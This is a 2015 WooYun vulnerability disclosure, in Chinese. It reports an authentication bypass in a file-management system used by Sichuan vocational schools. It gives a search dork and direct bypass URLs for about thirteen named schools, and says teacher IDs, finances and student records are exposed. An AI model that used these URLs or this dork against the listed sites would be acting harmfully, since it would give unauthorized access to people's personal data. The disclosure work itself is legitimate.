当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0103002

漏洞标题:四川某教育通用系统配置不当,导致敏感数据泄漏

相关厂商:cncert国家互联网应急中心

漏洞作者: 兜兜揣肉包

提交时间:2015-03-25 11:55

修复时间:2015-05-14 08:28

公开时间:2015-05-14 08:28

漏洞类型:重要敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-25: 细节已通知厂商并且等待厂商处理中
2015-03-30: 厂商已经确认,细节仅向厂商公开
2015-04-09: 细节向核心白帽子及相关领域专家公开
2015-04-19: 细节向普通白帽子公开
2015-04-29: 细节向实习白帽子公开
2015-05-14: 细节向公众公开

简要描述:

这是一个四川地区教育部门的通用系统。可以绕过系统资源管理登录,直接查看各种敏感资料.

详细说明:

首先通过 URL的特征搜索
inurl:pubfile.xwl
得到以下的网站存在这些漏洞:
什邡市职业中专学校国家示范校建设佐证材料
http://www.sfzyzz.cn:6869/file/main?action=webbuilder/application/files/pubfile.xwl
四川省商业服务学校示范学校建设计划项目佐证材料
http://www.scbss.com/webcontent/main?action=webbuilder/application/files/pubfile.xwl
自贡职业技术学校示范学校建设计划项目佐证材料
http://zgvtc.com:9999/main?action=webbuilder/application/files/pubfile.xwl
成都市现代职业技术学校示范学校建设计划项目佐证材料
http://systems.cdsxdzx.com/file/main?action=webbuilder/application/files/pubfile.xwl
成都市高级技工学校示范学校建设计划项目佐证材料
http://222.209.208.27:9111/jsxy/main?action=webbuilder/application/files/pubfile.xwl
中国水电七局高级技校示范学校建设计划项目佐证材料
http://117.139.121.134:8088/material/main?action=webbuilder/application/files/pubfile.xwl
宜宾市南溪职业技术学校示范学校建设计划项目佐证材料
http://117.139.109.143:8081/main?action=webbuilder/application/files/pubfile.xwl
中国十九冶高级技工学校示范学校建设计划项目佐证材料
http://118.121.219.7:3312/main?action=webbuilder/application/files/pubfile.xwl
四川省大英县中等职业技术学校示范学校建设计划项目佐证材料
http://222.214.237.11:8010/file/main?action=webbuilder/application/files/pubfile.xwl
四川省武胜职业中专学校示范学校建设计划项目佐证材料
http://218.88.239.59:8088/main?action=webbuilder/application/files/pubfile.xwl
攀枝花市建筑工程学校60个质量监测数据
http://www.pzhjx.com:8080/main?action=webbuilder/application/files/pubfile.xwl
西北煤矿机械制造高级技工学校国家示范校建设佐证材料
http://www.xbws.com.cn/file/main?action=webbuilder/application/files/pubfile.xwl
攀枝花市建筑工程学校国家示范校建设佐证材料
http://218.89.109.21:8084/myfile/main?action=webbuilder/application/files/pubfile.xwl
给一个图例吧:

QQ截图20150322130212.jpg


漏洞证明:

以第一个
四川省商业服务学校为例,其主站为:
http://www.scbss.com/
其网站资源管理系统url为:
http://www.scbss.com/webcontent/ 需要账户登录的

QQ截图20150322130039.jpg


但是通过修改url可以绕过密码,直接登录。
http://www.scbss.com/webcontent/main?action=webbuilder/application/files/pubfile.xwl

QQ截图20150322130300.jpg


至于有哪些敏感的数据呢?我来一一列举:
一、教师个人身份证,毕业证信息泄漏

QQ截图20150322130612.jpg


二、学校财务信息泄漏

QQ截图20150322130907.jpg


三、学生学籍信息泄漏(在线观看清晰度不高,可以抓包下载的)

QQ截图20150322131053.jpg


四、学校资金收入(中央投资啊)

QQ截图20150322131407.jpg


,,,,,,其他应有尽有

修复方案:

验证

版权声明:转载请注明来源 兜兜揣肉包@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-03-30 08:26

厂商回复:

暂未能确认软件生产厂商,同时未建立与涉事单位(学校)的直接处置渠道,待认领.

最新状态:

暂无


漏洞评价:

评论